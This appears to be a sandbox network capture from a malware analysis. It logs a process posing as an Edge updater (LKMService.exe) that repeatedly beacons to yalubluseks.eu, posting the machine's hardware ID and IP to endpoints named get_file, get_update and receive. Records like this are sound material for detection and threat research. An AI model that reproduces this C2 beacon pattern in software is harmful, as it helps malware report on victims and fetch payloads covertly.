2024-10-03 01:28:31 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:31 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:28:31 UTC	601	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gkmQI8RQ369IBjm6NibcWVYa4SQDNY7ltFS3GcuVuH41ZFInAJx4kO8BuuSDkqt0ZH8dbaXMHjNuw04t0eKp4SNDXduMWrckM66H8dJCNfCtuQydmBcGeXsqvxmKtWHvGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc927eaabae4235-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	52941	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:31 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:28:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:32 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:28:32 UTC	609	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SR7ccjZigvScW5IRX%2BVbvpOU%2B6qhGIF0VDDFBrIZvkOrSZB5zto4u07KL9L5ZqWhaCyfYlribARn7B%2Bq0h8rSUvT3%2BxYQkTGGAviUAwRkxXSup23uYatkpHJse0NxsKtKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc927f07d398c9c-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	52943	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:35 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:35 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:28:36 UTC	609	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hqCdoRWl1ydEzdHhqoISBvs0ds%2FcEBa7yt%2BjsSHszKkG2U0S0%2Bm3Ul3cSUvB6P0%2FPmonlXyYB5FyRAj3gWjdSXkd1nPzDKqmMS8ijviaxAAanqNmV27ezVz7TbbKqox1mA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92804aa050cb2-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	52945	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:37 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:38 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:28:38 UTC	607	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mGOOf53uTnkQ4liY1K9OKE64rPYQCP87YMH%2FldNVaUUvGSu2TwTWzyJAurSlXWAACzAWQMMjbu%2BwUQ9PNgPL8g5lBqfbGuNduDYttBACZdH1ZjjVgrMngEz9DcuxSdK8%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92814cca442a3-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	52946	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:38 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:28:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:39 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:28:39 UTC	611	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Z044RL6w4ELmtPGW0RXKnGqn%2BhCsSc3FvEKp0ZwbchZUyJ08NqBdgCf8AKDsb%2F2FzHpTkD2Xz7f0AI%2Bp87paSsG2CqasAa24RDrxR%2FEMi9WiWb9KPsMgwxUszDyNbf%2FGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9281b99b38c54-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	52949	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:42 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:43 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:28:43 UTC	601	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lxUtwJGTLXmSJFNYwuQs8Ng5Q4awSUXckCgw2ED2ZK3LTmQ3pagdEdgoNZGWHpDkQebn4zAxbLh4TbAr6biAFduFOycRuTz09y5sNvVsCxb5DhqFatGpNi2hzRmqiv0PYA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc928351830de9a-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	52951	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:44 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:44 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:28:44 UTC	613	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aG9uKOTR%2Fj9s%2F0aG7JcRBwgUW%2FuUdkITtH4CPe8jJaYf93veY0rmvKvuYtZa88qQM7JpijvOAJ%2BxplNVJkgyI88GkZ331HT7zFOuSe6xELsz1Te%2B%2Fh81DBzo2swo6cJrpw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9283dbda01839-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	52952	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:45 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:28:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:45 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	52954	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:48 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:48 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:28:49 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20N00DnbL9ZCvO9Am6zQyXBOYgB%2FDZWaxyyzK4LqNBvPVcF77TvyDyoht1c0F5KpuxggiG6PzyqgG9wwAWxRpsbz6OUwcaIGGICG2RcT92torQLgV9wbkePnKlKPV4tF%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc928598bd68c09-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	52956	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:50 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:50 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:28:50 UTC	602	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH9bQyC0GmoGkMSD0PgiYS9hGr3Iz%2BQAk7E84NopPNG64IDRCdUdEaSQgZWMaEGHF%2FcC2d2ee1FiAgEZevJ0aBViG9rmlZpOBXLdggc4tyCv%2BwjZr9sgLXYtSfdmFU2Lhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc928623a0e8cad-EWR
2024-10-03 01:28:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	52957	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:51 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:28:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:51 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:28:51 UTC	613	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8KyDRjQBOJLD%2B7iOxbsAkXWZonog%2BQyeQb9%2BSzkMUwXVBAiU2jfuH8SeQmij8cRXQ%2BvYCWOTpfkk%2BsB3N0Ro20VqVlRXW%2FZYmIZkbveKHRmkDOkmGH10RSNsD8g8peCSBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92867f995c347-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	52959	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:29:22 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:29:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:29:22 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:29:23 UTC	609	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8zEeI2DulwdTnWbkck2TFHJNTINYfcp0pkdv4ctUjGgBIjjtoF35dgjOm%2B9kNl817QTt1y0PctsCoQQ%2Bdo5NiN98N7dqdCxjEMPsyG%2Fhurgc0wUhGgSbs4iIAIkCztSVQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9292c7a397283-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	52961	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:29:23 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:29:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:29:24 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:29:24 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UpdIduEepSfuqrnLjUkf7xxc7aWw0aA52%2BlG6GypNoaQjDSHS6eMAClgNqgLfupSprUjXR6FYr%2FZdPBlIYv7JnfJVHWw8wC2cUfJB6RzvrBqYAjqGFEhbQhBuqTBbFCuzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc929358dad4303-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	52962	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:29:24 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:29:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:29:25 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:29:25 UTC	613	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JjdmVbCT37tNYaSu1I%2BK%2BQBR%2Fes%2FmXc7cHsP5B0k6uafHuPhuVOp10FrTVCgmHiJVI2ekVo%2FvyCEvhO7v0Dyr%2Ffs4tKBYTEZMr040CHnQmsYt7fOB8gLHATLl5rfpGiIRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9293b398843ab-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.6	52965	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:29:56 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:29:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:29:56 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:29:56 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fniMEKcqckbxa5G7W5%2B9Vip60ipBhUkjWqdgddfvpPoWDejx%2FdBm25qF0p8xEwLVJmbCouSdvRCAxkCvNsEen0UtXrEFgDZWyTfHYkocrmFB2vV6gbdffBjwH2GlDdfLsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc929ff3d92443e-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.6	52968	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:29:59 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:29:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:29:59 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:29:59 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=micCEbqIRWamFvlfH0zYA8Bq05sXnhEoH1A2GixrDdXuJ4ZXV8SRfSZ3TJUGejlDwAyI57fSwC9dZOuvRNKhaLK4skDfje5%2BRW%2FytU0gbR2ECWvbhSr4d5wv9VikkRjHvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92a114a0742e0-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.6	52970	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:00 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:30:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:30:00 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:30:01 UTC	603	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Agzj7WTiMrkzeduMl9XQOoISzJjBa1l8T4Bc9t5xF7Rkyrq9jPznyOwCqGPYTdDxOmQg2yXDpDRZ0b0PsiShqsmqlzQx3I5xrKvZJ80ztRoa%2FzvbEsQ3Fbe43WsoKwMIlw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92a1adafc4289-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	52971	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:01 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:30:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:30:01 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:30:02 UTC	611	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iu4Xs2m80VgMs%2BBOA1tAVyiFtC298CkVuu4ncs1atUb%2BUMksEt%2FlzlnSDhIabrvrpEZmOrNoHldxRXgYfQ6UzEpBPqB%2BokCGdc4txk3ACWXSbA%2Bz0q5LHJbxIBE8HOMsYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92a20d8761986-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.6	52973	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:09 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:30:10 UTC	25	IN	HTTP/1.1 100 Continue
